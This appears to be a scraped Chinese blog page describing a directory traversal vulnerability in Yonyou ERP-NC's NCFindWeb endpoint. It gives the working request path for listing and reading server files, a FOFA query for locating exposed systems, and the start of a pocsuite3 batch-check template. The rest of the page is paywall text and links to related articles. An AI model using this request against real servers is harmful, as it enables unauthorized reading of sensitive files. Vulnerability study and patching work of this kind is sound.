SRC-用友 ERP-NC NCFindWeb 目录遍历漏洞

最新推荐文章于 2024-12-12 10:43:51 发布

原创

最新推荐文章于 2024-12-12 10:43:51 发布 · 1.3k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #网络 #web安全

本文介绍了用友ERP-NC系统中存在的目录遍历漏洞，攻击者能够通过构造特定URL获取敏感文件。提供了POC验证方法，包括手动验证和使用pocsuite3工具进行批量验证。此外，还提及了安全学习资源，包括技术文档、书籍、面试题和视频教程，以助于提升安全技能。

漏洞描述

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。

fofa：

poc：/NCFindWeb?service=IPreAlertConfigService&filename=
在url处拼接poc后可以看到该站点的目录和文件

访问某个文件
/NCFindWeb?service=IPreAlertConfigService&filename=文件名

编写poc批量验证
这里使用的是pocsuite3的poc模板

# 调用pocsuite的一些API函数
from pocsuite3.api import Output, register_poc, requests, POCBase

# 继承POCBase类
class DemoPOC(POCBase):
vulID = '0' # ssvid ID， 如果是提交漏洞的

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

zkzq

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

用友OA漏洞学习——NCFindWeb 目录遍历漏洞

记录并分享学习安全的知识点..

07-03

1639

用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。

用友ERP-NC 目录遍历

「我唯一会的和擅长的只有网络安全，如果我不能在我最擅长的事情上取得成功，那么我根本不知道，我的人生还有什么意义。」

08-20

513

子夏曰：“贤贤易色，事父母能竭其力，事君能致其身，与朋友交，言而有信，虽曰未学，吾必谓之学矣。”

参与评论您还未登录，请先登录后发表或查看评论

用友NC 漏洞

2301_80115097的博客

12-01

872

NCFindWeb?service=IPreAlertConfigService&filename=文件名。用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。if判断返回的数据出现index.html文件名则代表存在漏洞，否则不存在。在url处拼接poc后可以看到该站点的目录和文件。这里使用的是pocsuite3的poc模板。只需要修改_verify()部分即可。使用pocsuite3批量验证。

用友NC目录遍历漏洞

DUANYU23的博客

04-26

3015

用友NC目录遍历漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X005 POC0X006 修复建议 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标搜索语法：title="Azkaban" 0X042 访问网页（目录遍历） http://ip/NCFindWeb?service=IPreAlertConfigService&filename 0X005 POC 0X0

用友NC目录遍历漏洞复现

The current road is different, love needs to distinguish between right and wrong

11-18

2592

简介：用友ERP-NC 存在目录遍历漏洞，攻击者可以通过目录遍历获取敏感文件信息。漏洞复现： fofa直接搜索： app="用友-UFIDA-NC" 漏洞拼接目录: /NCFindWeb?service=IPreAlertConfigService&filename /NCFindWeb?service=IPreAlertConfigService&filename= 读取：filename=读取的文件名 ...

用友UFIDA NC目录遍历漏洞

热门推荐

Libra1313的博客

10-23

1万+

经常会有大学生粉丝朋友私信大白，想通过打CTF比赛镀金，作为进入一线互联网大厂的门票。但是在CTF做题很多的时候都会用到工具，所以在全网苦寻CTF比赛工具安装包！

用友NC NCCLOUD CNVD高危漏洞修复补丁

QB2767846279

11-13

4265

打补丁顺序漏洞名称问题描述版本 1 NC&NCC 2020-09-10安全补丁合集反序列化、远程命令执行等通用补丁方案 NC6X/NCC 2 NC6X安全补丁集 6X版本补丁集，解决一些通用漏洞 NC63/NC65 3 NCC1909,1903,2005安全必打补丁合集 NCC版本补丁集，解决一些通用漏洞 NCC1909/NCC1903/NCC2005 4 BSH远程代码执行漏洞 B

用友ERP-NC系统 NCFindWeb接口文件读取

maverickpig的博客

03-10

2636

用友NC NCfindweb接口文件读取漏洞

用友ERP系统

ajlgl的博客

05-24

5648

用友ERP

用友ERP系统的功能模块及编程实现

PixelEnigma的博客

10-09

484

以下是对用友ERP系统常见的功能模块的描述，同时还提供了相应的编程示例。总结来说，用友ERP系统是一个功能强大的企业管理软件，它通过提供多个功能模块，帮助企业实现人力资源管理、采购管理、销售管理等各个方面的业务流程。通过编程与用友ERP系统的API进行集成，可以更灵活地实现定制化的业务需求。请注意，这些示例仅作为演示，实际使用时需要替换为您自己的用友ERP系统的API端点和数据。除了上述提到的功能模块，用友ERP系统还涵盖了其他重要的模块，如财务管理模块、库存管理模块、生产管理模块等。

《软件外包服务岗前技能训练（二）》之学习用友ERP系统供应商寄存采购业务

m0_64064695的博客

12-27

1456

总的来说，学习用友系统不仅涉及到技术操作，也包括理解业务流程、重视细节、提升专业技能以及适应系统更新等多个方面，让我们在今后的学习中不断成长吧！

用友 ERP 修改生产订单生产部门和生产类别语句

m0_61834747的博客

12-08

182

SELECT MDeptCode,MoTypeId ,* FROM mom_orderdetail WHERE MoId='1000000934'UPDATE mom_orderdetailSET MoTypeId = '1000000004'WHERE MoId IN ( '1000001456','1000002059','1000002180','1000002212' ,'1000002041','1000002213');SELECT * FROM dbo.mom_order WHERE MoCo

《用友ERP-U8（V8.72）模拟实战----财务、供应链和生产制造》一1.3 安装用友ERP-U8（V8.72）软件...

weixin_34099526的博客

05-02

822

本节书摘来自异步社区《用友ERP-U8（V8.72）模拟实战----财务、供应链和生产制造》一书中的第1章，第1.3节，作者龚中华 , 何平，更多章节内容可以访问云栖社区“异步社区”公众号查看 1.3 安装用友ERP-U8（V8.72）软件用友ERP-U8（V8.72）模拟实战----财务、供应链和生产制造如果用户从用友公司购买用友软件，用友公司将上...

nc java 5.7,用友ERP NC v5.7 ——安装详解篇

weixin_26858217的博客

03-11

1165

环境描述:(1)操作系统(OS)：Windows Server 2008 Enterprise 64bit(2)数据库：Oracle 11g 64bit(3)ERP ：用友NC V5.7二、建立数据表空间及用户名：将如下脚本数据导入Oracle中，如下图：注：为了方便大家复制下面的脚本，故同时采用2种方式：(1)文本 (2)截图CREATE TABLESPACE NNC_DATA01 DA...